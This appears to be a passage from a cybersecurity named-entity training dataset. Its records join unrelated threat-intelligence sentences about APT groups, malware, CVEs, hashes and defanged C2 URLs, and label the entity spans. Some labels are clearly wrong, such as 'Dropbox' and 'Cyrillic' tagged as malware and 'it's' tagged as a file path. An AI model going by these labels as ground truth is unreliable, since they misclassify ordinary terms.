{"text": "The malicious application sends a request to choose a network account , a specific account that can only be processed by authentication services exported by the malicious application . As explained later , we believe this campaign is financially-motivated and that it targets accounting departments in Russian businesses . Dexphot usually extracts the decompressed files to the target system ’s Favorites folder . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": {"ORGANIZATION: accounting departments": [[276, 298]], "ORGANIZATION: businesses": [[310, 320]], "MALWARE: Dexphot": [[323, 330]], "TOOL: Favorites folder": [[395, 411]]}, "info": {"id": "cyberner_stix_train_005604", "source": "cyberner_stix_train"}}
{"text": "More details on this protection is available in the conclusion of the report .", "spans": {}, "info": {"id": "cyberner_stix_train_005605", "source": "cyberner_stix_train"}}
{"text": "One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . Clever Kitten primarily targets global companies with strategic importance to countries that are contrary to Iranian interests .", "spans": {"TOOL: dropper": [[49, 56]], "THREAT_ACTOR: Clever Kitten": [[169, 182]]}, "info": {"id": "cyberner_stix_train_005606", "source": "cyberner_stix_train"}}
{"text": "We also found a Windows version of the UnionCryptoTrader ( 0f03ec3487578cef2398b5b732631fec ) .", "spans": {"SYSTEM: Windows": [[16, 23]], "TOOL: UnionCryptoTrader": [[39, 56]], "FILEPATH: 0f03ec3487578cef2398b5b732631fec": [[59, 91]]}, "info": {"id": "cyberner_stix_train_005607", "source": "cyberner_stix_train"}}
{"text": "Kaspersky found Zebrocy deploying a compiled Python script , which we call PythocyDbg , within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy and communications debug capabilities . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: Zebrocy": [[16, 23]], "TOOL: Python script": [[45, 58]], "TOOL: PythocyDbg": [[75, 85]], "FILEPATH: st07383.en17.docx": [[271, 288]], "VULNERABILITY: CVE-2017-0001": [[339, 352]], "FILEPATH: SHIRIME": [[458, 465]]}, "info": {"id": "cyberner_stix_train_005608", "source": "cyberner_stix_train"}}
{"text": "Sending C2-specified SMS messages to phone numbers in the victim ’ s contacts . PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data exfiltration . This vbs is properly the macro executed by the macro engine of word . Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[80, 90]], "THREAT_ACTOR: Threat actors": [[265, 278]]}, "info": {"id": "cyberner_stix_train_005609", "source": "cyberner_stix_train"}}
{"text": "In later versions , another encryption layer is added using Curve25519 encryption . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 . APT32 poses a threat to companies doing business or preparing to invest in Vietnam .", "spans": {"ORGANIZATION: ESET": [[97, 101]], "MALWARE: Okrum": [[114, 119]], "THREAT_ACTOR: APT32": [[262, 267]]}, "info": {"id": "cyberner_stix_train_005610", "source": "cyberner_stix_train"}}
{"text": "Their similarity is made more apparent by looking at their naming method for downloadable files , domain structure of fake websites and other details of their deployment techniques , exemplified in figure 10 . APT19 seemed to be going after defense sector firms , Chinese dissident groups and other political target , as well as certain financial targets and other commercial targets in pharmaceutical and energy sectors that could benefit the Chinese economy . In our sample, after the malware sent the 0 action, the controller responded with an A record containing 24.125.10.140 . Future cybercriminal campaigns on social network platforms may not be so gentle .", "spans": {"THREAT_ACTOR: APT19": [[210, 215]], "ORGANIZATION: defense sector firms": [[241, 261]], "ORGANIZATION: Chinese dissident groups and other political target": [[264, 315]], "ORGANIZATION: financial targets": [[337, 354]], "ORGANIZATION: commercial targets in": [[365, 386]], "ORGANIZATION: pharmaceutical and": [[387, 405]], "ORGANIZATION: energy sectors": [[406, 420]], "IP_ADDRESS: 24.125.10.140": [[567, 580]], "TOOL: social network platforms": [[617, 641]]}, "info": {"id": "cyberner_stix_train_005611", "source": "cyberner_stix_train"}}
{"text": "Proofpoint researchers have observed a well-known Russian-speaking APT actor usually referred to as Turla using a new .NET/MSIL dropper for an existing backdoor called JS/KopiLuwak . Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled Договор.doc” [Contract.doc] .", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "THREAT_ACTOR: Turla": [[100, 105]], "TOOL: dropper": [[128, 135]], "MALWARE: JS/KopiLuwak": [[168, 180]], "ORGANIZATION: Group-IB": [[183, 191]], "TOOL: emails": [[233, 239]], "FILEPATH: malicious Microsoft Word attachment titled Договор.doc”": [[253, 308]], "FILEPATH: [Contract.doc]": [[309, 323]]}, "info": {"id": "cyberner_stix_train_005612", "source": "cyberner_stix_train"}}
{"text": "The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia . This module monitors a wide range of device activities including application installation / remove / update , phone restart and battery charge .", "spans": {"ORGANIZATION: oil and gas": [[4, 15]], "THREAT_ACTOR: Naikon": [[108, 114]], "ORGANIZATION: energy resources": [[210, 226]], "FILEPATH: module": [[280, 286]]}, "info": {"id": "cyberner_stix_train_005613", "source": "cyberner_stix_train"}}
{"text": "Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as “ Mimikatz ” for lateral movement .", "spans": {"TOOL: USB": [[69, 72]], "TOOL: Mimikatz": [[123, 131]]}, "info": {"id": "cyberner_stix_train_005614", "source": "cyberner_stix_train"}}
{"text": "The attackers send fake text messages to lure the victims to click on a malicious link . Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . The threat group using these implants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian government .", "spans": {"THREAT_ACTOR: APT10": [[101, 106]], "ORGANIZATION: government": [[379, 389]]}, "info": {"id": "cyberner_stix_train_005615", "source": "cyberner_stix_train"}}
{"text": "PLATINUM primarily targets its intended victims using spear phishing . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker , 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "ORGANIZATION: Group-IB": [[81, 89]], "ORGANIZATION: banks": [[151, 156], [259, 264]], "ORGANIZATION: service provider": [[186, 202]], "ORGANIZATION: bank": [[219, 223]]}, "info": {"id": "cyberner_stix_train_005616", "source": "cyberner_stix_train"}}
{"text": "ac5abaebd9f516b8b389450f7d27649801d746fb14963b848f9d6dad0a505e66 3a45d7a16937d4108b5b48f44d72bb319be645cbe15f003dc9e77fd52f45c065 Domains cvcws [ . The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . The newest campaign uses updated versions of Aumlib and Ixeshe . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": {"ORGANIZATION: Tibetan community": [[152, 169]], "TOOL: malware": [[239, 246]], "MALWARE: Aumlib": [[346, 352]], "MALWARE: Ixeshe": [[357, 363]]}, "info": {"id": "cyberner_stix_train_005617", "source": "cyberner_stix_train"}}
{"text": "The steps implemented include : Load a URL in a WebView Run JavaScript in WebView Toggle WiFi state Toggle mobile data state Read/modify SMS inbox Solve captchas Captchas One of the more interesting states implements the ability to solve basic captchas ( obscured letters and numbers ) . Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations – not destructive attacks or fraud . The first thread is the “ communication ” thread . If executed successfully , LIGHTWORK provides the operator the following command - line output : Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis .", "spans": {"THREAT_ACTOR: Bahamut": [[299, 306]], "TOOL: communication": [[449, 462]], "MALWARE: LIGHTWORK": [[501, 510]]}, "info": {"id": "cyberner_stix_train_005618", "source": "cyberner_stix_train"}}
{"text": "Wh1sks estimated that , between June and early August , the Shadow Brokers have made up to $88,000 in an alternative cryptocurrency called Monero . Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2. This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP PROT 443 . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others . If it's Cyrillic and the command to the shell is not ‘ipconfig’ , the threat converts the command result text encoding from Cyrillic to UTF-16 . Similar to the Bisonal variant targeting the Russian organization , this sample was also disguised as PDF document .", "spans": {"ORGANIZATION: Wh1sks": [[0, 6]], "THREAT_ACTOR: Shadow Brokers": [[60, 74]], "ORGANIZATION: cryptocurrency": [[117, 131]], "ORGANIZATION: Booz Allen Hamilton": [[148, 167]], "ORGANIZATION: AhnLab": [[180, 186]], "TOOL: C2": [[253, 255], [477, 479]], "THREAT_ACTOR: Bisonal malware": [[300, 315]], "FILEPATH: Bisonal": [[385, 392], [945, 952]], "FILEPATH: Bisonal malware": [[570, 585]], "FILEPATH: sample": [[659, 665]], "FILEPATH: it's": [[788, 792]], "MALWARE: Cyrillic": [[793, 801]], "MALWARE: UTF-16": [[921, 927]], "TOOL: PDF": [[1032, 1035]]}, "info": {"id": "cyberner_stix_train_005619", "source": "cyberner_stix_train"}}
{"text": "The “ boot ” module has placeholder classes for the entry points of the infected applications . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system . Not only is it harder to detect the malicious code while it ’s running , it ’s harder to find useful forensics after the process has stopped . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": {"MALWARE: Careto": [[125, 131]], "MALWARE: Domen toolkit": [[426, 439]], "TOOL: SolarMarker": [[542, 553]], "MALWARE: NetSupport RAT": [[569, 583]]}, "info": {"id": "cyberner_stix_train_005620", "source": "cyberner_stix_train"}}
{"text": "The targeting of Chinese nationals may also be related to this campaign , but equally may be part of a separate campaign by the adversary or even as part of them selling Surveillance-As-A-Service in a similar manner previously seen with the HANGOVER group . KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine .", "spans": {"TOOL: Surveillance-As-A-Service": [[170, 195]], "THREAT_ACTOR: HANGOVER group": [[241, 255]], "MALWARE: KeyBoy": [[258, 264]]}, "info": {"id": "cyberner_stix_train_005621", "source": "cyberner_stix_train"}}
{"text": "The Janus vulnerability , which allows the actor to replace any application with an infected version . We noticed that criminals were spreading Buhtrap using this method from May 2015 to August 2015 . exe ( for extracting files from the password-protected ZIP archive ) , rundll32.exe ( for loading the loader DLL ) , schtasks.exe ( for scheduled tasks ) , powershell.exe ( for forced updates ) . User Execution : Malicious Link APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link .002 User Execution : Malicious File APT29 has used various forms of spearphishing attempting to get a user to open attachments , including , but not limited to , malicious Microsoft Word documents , .pdf , and .lnk files .", "spans": {"VULNERABILITY: Janus": [[4, 9]], "THREAT_ACTOR: Buhtrap": [[144, 151]], "FILEPATH: exe": [[201, 204]], "FILEPATH: rundll32.exe": [[272, 284]], "TOOL: DLL": [[310, 313]], "FILEPATH: schtasks.exe": [[318, 330]], "FILEPATH: powershell.exe": [[357, 371]], "THREAT_ACTOR: Malicious Link APT29": [[414, 434]], "THREAT_ACTOR: Malicious File APT29": [[550, 570]]}, "info": {"id": "cyberner_stix_train_005622", "source": "cyberner_stix_train"}}
{"text": "The set of permissions required by Marcher according to the manifest is as follows : ∗ android.permission.CHANGE_NETWORK_STATE ( change network connectivity state ) ∗ android.permission.SEND_SMS ( send SMS messages ) ∗ android.permission.USES_POLICY_FORCE_LOCK ( lock the device ) ∗ android.permission.RECEIVE_BOOT_COMPLETED ( start malware when device boots ) ∗ android.permission.INTERNET ( communicate with the internet ) ∗ android.permission.VIBRATE The oldest sample we've seen up to now is from November 2013 . As our analysis demonstrates , ZxShell is an effective tool that can be ultimately used to steal user credentials and other highly valuable information . Having such a gap with the most commonly used domain allowed with CSP is a major risk indicator of the threats that can come from other domains that are used to serve multiple accounts .", "spans": {"MALWARE: Marcher": [[35, 42]], "MALWARE: ZxShell": [[548, 555]]}, "info": {"id": "cyberner_stix_train_005623", "source": "cyberner_stix_train"}}
{"text": "This specific IP address is a critical piece of information that enables us to connect this attack to a spree of previous targeted campaigns .", "spans": {}, "info": {"id": "cyberner_stix_train_005624", "source": "cyberner_stix_train"}}
{"text": "] it Firenze server4fi.exodus.connexxa [ . TEMP.Veles created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly . Zavantazhyty means to load or download in Ukranian . For Snort coverage that can detect the exploitation of these vulnerabilities , download the latest rule sets from Snort.org , and our latest Vulnerability Advisories are always posted on Talos Intelligence ’s website .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[43, 53]], "TOOL: custom malware": [[64, 78]], "TOOL: tailormade credential gathering tools": [[93, 130]], "ORGANIZATION: Snort": [[270, 275]]}, "info": {"id": "cyberner_stix_train_005625", "source": "cyberner_stix_train"}}
{"text": "The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources .", "spans": {"MALWARE: CONFUCIUS_B": [[4, 15]], "TOOL: RTLO": [[104, 108]], "FILEPATH: attacks": [[141, 148]]}, "info": {"id": "cyberner_stix_train_005626", "source": "cyberner_stix_train"}}
{"text": "There are several indicators ( see section \" trojan activity '' below ) that it is in its last stages of development , but it has the potential to be a serious threat . Cloud Atlas remains very prolific in Eastern Europe and Central Asia . FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[169, 180]], "ORGANIZATION: FireEye": [[240, 247]], "THREAT_ACTOR: APT37": [[294, 299]], "VULNERABILITY: zero-day": [[312, 320]], "TOOL: Adobe Flash": [[321, 332]], "VULNERABILITY: CVE-2018-4878": [[349, 362]], "MALWARE: DOGCALL": [[379, 386]], "MALWARE: malware": [[387, 394]]}, "info": {"id": "cyberner_stix_train_005627", "source": "cyberner_stix_train"}}
{"text": "Instead , we feel the targeting of drug dealers was a new task for a subset of the Dukes group , possibly due to the drug trade ’s relevance to security policy issues .", "spans": {"THREAT_ACTOR: Dukes": [[83, 88]]}, "info": {"id": "cyberner_stix_train_005628", "source": "cyberner_stix_train"}}
{"text": "It uses the same technique as it used to determine the offset to the mmap function . In March 2014 , the gang behind Potao started using a new infection vector . APT17 : 4c21336dad66ebed2f7ee45d41e6cada . The page hxxp://[c2_hostname]/groups / business - principles.html is used as an starting point for the attack .", "spans": {"TOOL: Potao": [[117, 122]], "TOOL: infection vector": [[143, 159]], "THREAT_ACTOR: APT17": [[162, 167]], "FILEPATH: 4c21336dad66ebed2f7ee45d41e6cada": [[170, 202]]}, "info": {"id": "cyberner_stix_train_005629", "source": "cyberner_stix_train"}}
{"text": "Based on our observations of interactions in this channel , between May 2016 and June 2016 , malicious actors validated 2 , 987 cards from 62 countries , with the most coming from the U.S. (nearly half) , Brazil , and France . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": {"THREAT_ACTOR: actors": [[103, 109]], "THREAT_ACTOR: HELIX KITTEN actors": [[242, 261]], "ORGANIZATION: personnel": [[397, 406]]}, "info": {"id": "cyberner_stix_train_005630", "source": "cyberner_stix_train"}}
{"text": "The original leak is no longer available on github.com , but a copy can be found here . Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . The IXESHE campaign has been successfully executing targeted attacks since 2009 . As Google Analytics is allowed in the CSP configuration of many major sites , this demo shows how an attacker can bypass this security protection and steal data .", "spans": {"THREAT_ACTOR: The Lamberts": [[133, 145]], "ORGANIZATION: ITSec community": [[185, 200]], "ORGANIZATION: FireEye": [[236, 243]], "VULNERABILITY: zero day vulnerability": [[273, 295]], "VULNERABILITY: CVE-2014-4148": [[298, 311]], "THREAT_ACTOR: IXESHE": [[320, 326]], "ORGANIZATION: Google Analytics": [[401, 417]], "ORGANIZATION: CSP": [[436, 439]], "THREAT_ACTOR: attacker": [[499, 507]]}, "info": {"id": "cyberner_stix_train_005631", "source": "cyberner_stix_train"}}
{"text": "5db49122d866967295874ab2c1ce23a7cde50212ff044bbea1da9b49bb9bc149 70e2eea5609c6954c61f2e5e0a3aea832d0643df93d18d7d78b6f9444dcceef0 80810a8ec9624f317f832ac2e212dba033212258285344661e5da11b0d9f0b62 8453ce501fee1ca8a321f16b09969c517f92a24b058ac5b54549eabd58bf1884 Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive—or even destructive—event . Vydalyty means to remove or delete in Ukrainian . • None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": {"ORGANIZATION: Dragos": [[260, 266]], "THREAT_ACTOR: XENOTIME": [[306, 314]], "VULNERABILITY: CVE-2022 - 41080": [[507, 523]], "VULNERABILITY: CVE-2022 - 41082": [[528, 544]]}, "info": {"id": "cyberner_stix_train_005632", "source": "cyberner_stix_train"}}
{"text": "It 's also raising eyebrows because of the connection with China , which has frequently sparred with the U.S. over cyber espionage . Rapid7 reviewed malware discovered in the victim’s environment and found implants that used Dropbox as the C2 . Daserf : f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06 .", "spans": {"ORGANIZATION: Rapid7": [[133, 139]], "MALWARE: Dropbox": [[225, 232]], "MALWARE: Daserf": [[245, 251]], "FILEPATH: f8458a0711653071bf59a3153293771a6fb5d1de9af7ea814de58f473cba9d06": [[254, 318]]}, "info": {"id": "cyberner_stix_train_005633", "source": "cyberner_stix_train"}}
{"text": "The code and functionality have changed numerous times ; from simple unobfuscated malware at the beginning to sophisticated multi-stage spyware that gives attackers full remote control of the infected device . MuddyWater compiles various offensive Python scripts . Taidoor is a threat group that has operated since at least 2009 and has primarily targeted the Taiwanese government .", "spans": {"THREAT_ACTOR: MuddyWater": [[210, 220]], "TOOL: Python": [[248, 254]], "TOOL: scripts": [[255, 262]], "THREAT_ACTOR: Taidoor": [[265, 272]], "ORGANIZATION: Taiwanese government": [[360, 380]]}, "info": {"id": "cyberner_stix_train_005634", "source": "cyberner_stix_train"}}
{"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . This is a hacking group with Chinese origins which targets selected organisations related with education , energy and technology .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: legitimate administration tools": [[15, 46]], "ORGANIZATION: education": [[288, 297]], "ORGANIZATION: energy": [[300, 306]], "ORGANIZATION: technology": [[311, 321]]}, "info": {"id": "cyberner_stix_train_005635", "source": "cyberner_stix_train"}}
{"text": "As a result , CTU researchers were unable to ascertain the initial access vector .", "spans": {"ORGANIZATION: CTU": [[14, 17]]}, "info": {"id": "cyberner_stix_train_005636", "source": "cyberner_stix_train"}}
{"text": "This Arabic-speaking group uses spear phishing attacks to infect target machines in the Middle East and North Africa with various Remote Access Trojans ( RATs ) .", "spans": {"TOOL: Remote Access Trojans": [[130, 151]], "TOOL: RATs": [[154, 158]]}, "info": {"id": "cyberner_stix_train_005637", "source": "cyberner_stix_train"}}
{"text": "According to our data , 0.4 % of the websites visited by users of our products were compromised sites . attacks to a Chinese-speaking threat actor group called LuckyMouse . In this case , the launcher is much simpler . What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": {"MALWARE: COSMICENERGY": [[230, 242]], "ORGANIZATION: Rostelecom - Solar": [[390, 408]], "ORGANIZATION: Russian cyber security company": [[413, 443]]}, "info": {"id": "cyberner_stix_train_005638", "source": "cyberner_stix_train"}}
{"text": "First , based on information that is associated with the registered C & C domain , we identified the name of the registrant , along with further data like country and email address , as seen in Figure 8 . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . SHA256 : eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435 .", "spans": {"MALWARE: st07383.en17.docx": [[217, 234]], "VULNERABILITY: CVE-2017-0001": [[285, 298]], "MALWARE: SHIRIME": [[404, 411]], "FILEPATH: eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435": [[423, 487]]}, "info": {"id": "cyberner_stix_train_005639", "source": "cyberner_stix_train"}}
{"text": "The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT . This includes Python scripts . Usually , the Stageless Meterpreter has the Ext_server_stdapi.x64.dll” , Ext_server_extapi.x64.dll” , and Ext_server_espia.x64.dll” extensions .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: social media": [[30, 42]], "TOOL: RATs": [[189, 193]], "TOOL: PupyRAT": [[202, 209]], "TOOL: Python": [[226, 232]], "FILEPATH: Stageless Meterpreter": [[257, 278]], "FILEPATH: Ext_server_stdapi.x64.dll”": [[287, 313]], "FILEPATH: Ext_server_extapi.x64.dll”": [[316, 342]], "FILEPATH: Ext_server_espia.x64.dll”": [[349, 374]]}, "info": {"id": "cyberner_stix_train_005640", "source": "cyberner_stix_train"}}
{"text": "If this file is not present , it is recreated from a hardcoded encrypted array inside the body of the DLL .", "spans": {"TOOL: DLL": [[102, 105]]}, "info": {"id": "cyberner_stix_train_005641", "source": "cyberner_stix_train"}}
{"text": "FireEye observed that BACKSWING , a malicious JavaScript profiling framework , was deployed to at least 54 legitimate sites starting as early as September 2016 . These emails included recruitment-themed lures and links to malicious HTML Application ( HTA ) files .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "TOOL: profiling framework": [[57, 76]], "TOOL: emails": [[168, 174]], "TOOL: HTML Application": [[232, 248]], "TOOL: HTA": [[251, 254]]}, "info": {"id": "cyberner_stix_train_005642", "source": "cyberner_stix_train"}}
{"text": "'' \" According to our statistics , as of today , there 're more than 500 , 000 Android devices infected by this bootkit in China in last six months . Where they exist , they often use grey market or pirated software . APT1 establishes a foothold once email recipients open a malicious file and a backdoor is subsequently installed . [ c2_hostname ] The purpose of the shellcode is to download a GIF image file from URL hxxp://[c2_hostname]/groups / pic.gif , then search for and decrypt the hidden PE file inside of it .", "spans": {"SYSTEM: Android": [[79, 86]], "TOOL: grey market": [[184, 195]], "TOOL: pirated software": [[199, 215]], "THREAT_ACTOR: APT1": [[218, 222]], "TOOL: email": [[251, 256]]}, "info": {"id": "cyberner_stix_train_005643", "source": "cyberner_stix_train"}}
{"text": "The content of the HTTP POST data is telemetry data in a json format about the device the malware is running on . The APT38 targeted news outlets known for their business and financial sector reporting , probably in support of efforts to identify and compromise additional financial institutions . After the modification , Depending on the platform and on how the code is compiled , these vulnerabilities could lead to arbitrary code execution : Talos is disclosing these vulnerabilities despite no official fix from Open Babel .", "spans": {"THREAT_ACTOR: APT38": [[118, 123]], "ORGANIZATION: news outlets": [[133, 145]], "ORGANIZATION: financial sector": [[175, 191]], "ORGANIZATION: financial institutions": [[273, 295]], "ORGANIZATION: Talos": [[446, 451]], "TOOL: Open Babel": [[517, 527]]}, "info": {"id": "cyberner_stix_train_005644", "source": "cyberner_stix_train"}}
{"text": "Wmiexec — This publicly available tool uses WMI to create SYSTEM-level shells on remote hosts .", "spans": {"TOOL: Wmiexec": [[0, 7]], "TOOL: WMI": [[44, 47]]}, "info": {"id": "cyberner_stix_train_005645", "source": "cyberner_stix_train"}}
{"text": "params : This command allows the malicious operator to change configuration parameters in the malware . MuddyWater has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia . KHRAT : File Name : 8081.dll . The usage of the h and m parameters and its values local and net are very similar to arguments used by Conti .", "spans": {"THREAT_ACTOR: MuddyWater": [[104, 114]], "ORGANIZATION: defense entities": [[172, 188]], "MALWARE: KHRAT": [[221, 226]], "FILEPATH: 8081.dll": [[241, 249]], "THREAT_ACTOR: Conti": [[355, 360]]}, "info": {"id": "cyberner_stix_train_005646", "source": "cyberner_stix_train"}}
{"text": "Should a user enable this content , Gallmaker is then able to use the DDE protocol to remotely execute commands in memory on the victima 's system . On January 15 , Confiant exposed the activity of the Zirconium group , spreading malicious ads via a network of fake ad agencies through 2017 , in what amounted to the largest malvertising campaign of recent times .", "spans": {"THREAT_ACTOR: Gallmaker": [[36, 45]], "TOOL: DDE protocol": [[70, 82]], "ORGANIZATION: fake ad agencies": [[261, 277]]}, "info": {"id": "cyberner_stix_train_005647", "source": "cyberner_stix_train"}}
{"text": "The first malicious sample we identified ( 6843AE9EAC03F69DF301D024BFDEFC88 ) had the file name “ testproj.exe ”", "spans": {"FILEPATH: 6843AE9EAC03F69DF301D024BFDEFC88": [[43, 75]], "FILEPATH: testproj.exe": [[98, 110]]}, "info": {"id": "cyberner_stix_train_005648", "source": "cyberner_stix_train"}}
{"text": "After that , it begins to harvest information stored on the device . In this latest campaign , APT34 leveraged the recent Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER . The group primarily uses Truvasys , a first-stage malware that has been in circulation for several years .", "spans": {"THREAT_ACTOR: APT34": [[95, 100]], "VULNERABILITY: Microsoft Office vulnerability": [[122, 152]], "VULNERABILITY: CVE-2017-11882": [[153, 167]], "TOOL: POWRUNER": [[178, 186]], "TOOL: BONDUPDATER": [[191, 202]], "MALWARE: Truvasys": [[230, 238]]}, "info": {"id": "cyberner_stix_train_005649", "source": "cyberner_stix_train"}}
{"text": "Kaspersky Internet Security for Android and the Sberbank Online app securely protect users against attacks by this Trojan . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . The Leviathan group has specifically targeted engineering , transportation , and the defense industry , especially where these sectors overlap with maritime technologies .", "spans": {"SYSTEM: Kaspersky Internet Security": [[0, 27]], "SYSTEM: Android": [[32, 39]], "SYSTEM: Sberbank Online app": [[48, 67]], "MALWARE: CONFUCIUS_B": [[128, 139]], "TOOL: RTLO": [[228, 232]], "THREAT_ACTOR: Leviathan group": [[264, 279]], "ORGANIZATION: engineering": [[306, 317]], "ORGANIZATION: transportation": [[320, 334]], "ORGANIZATION: defense industry": [[345, 361]]}, "info": {"id": "cyberner_stix_train_005650", "source": "cyberner_stix_train"}}
{"text": "Due to the sheer number of recipients , it may not have been possible to customize the emails in the same way as was possible with lower-volume campaigns .", "spans": {"TOOL: emails": [[87, 93]]}, "info": {"id": "cyberner_stix_train_005651", "source": "cyberner_stix_train"}}
{"text": "As mentioned earlier , we believe that OSX_DOK.C might be the MAC OS X version of WERDLOD , an online banking malware that used the same techniques as Operation Emmental .", "spans": {"MALWARE: OSX_DOK.C": [[39, 48]], "SYSTEM: MAC": [[62, 65]], "MALWARE: WERDLOD": [[82, 89]], "MALWARE: malware": [[110, 117]], "TOOL: Operation Emmental": [[151, 169]]}, "info": {"id": "cyberner_stix_train_005652", "source": "cyberner_stix_train"}}
{"text": "Hackers can hide their apps ’ real intentions or even manipulate users into leaving positive ratings , in some cases unknowingly . Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation . The MainConnectionIo function checks if the Windows Firewall is enabled , sets the Tcp Keep Alive value and Non-blocking mode connection options and receives data from the remote host through the ReceiveCommandData function . • Other actors merged into this group : 0 Sign up for free Mandiant Threat Intelligence for detailed reports about UNC groups including :", "spans": {"ORGANIZATION: Dragos": [[131, 137]], "SYSTEM: Windows": [[329, 336]], "TOOL: Firewall": [[337, 345]], "TOOL: Tcp Keep Alive": [[368, 382]]}, "info": {"id": "cyberner_stix_train_005653", "source": "cyberner_stix_train"}}
{"text": "APT33 leverages a mix of public and non-public tools and often conducts spear-phishing operations using a built-in phishing module from \" ALFA TEaM Shell \" , a publicly available web shell . We have reported the issues to the UPX team , and they have already fixed it .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "TOOL: public and non-public tools": [[25, 52]], "TOOL: ALFA TEaM Shell": [[138, 153]], "TOOL: publicly available web shell": [[160, 188]], "TOOL: UPX": [[226, 229]]}, "info": {"id": "cyberner_stix_train_005654", "source": "cyberner_stix_train"}}
{"text": "FireEye believes that two actors – Turla and an unknown financially motivated actor – were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions — often including military installations , intelligence agencies , and other government bodies .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "THREAT_ACTOR: actors": [[26, 32]], "ORGANIZATION: financially": [[56, 67]], "VULNERABILITY: CVE-2017-0261": [[120, 133]], "THREAT_ACTOR: APT28": [[140, 145]], "VULNERABILITY: CVE-2017-0262": [[180, 193]], "VULNERABILITY: CVE-2017-0263": [[250, 263]], "ORGANIZATION: Microsoft": [[298, 307]], "THREAT_ACTOR: groups": [[373, 379]], "THREAT_ACTOR: STRONTIUM": [[393, 402]], "THREAT_ACTOR: PLATINUM": [[407, 415]], 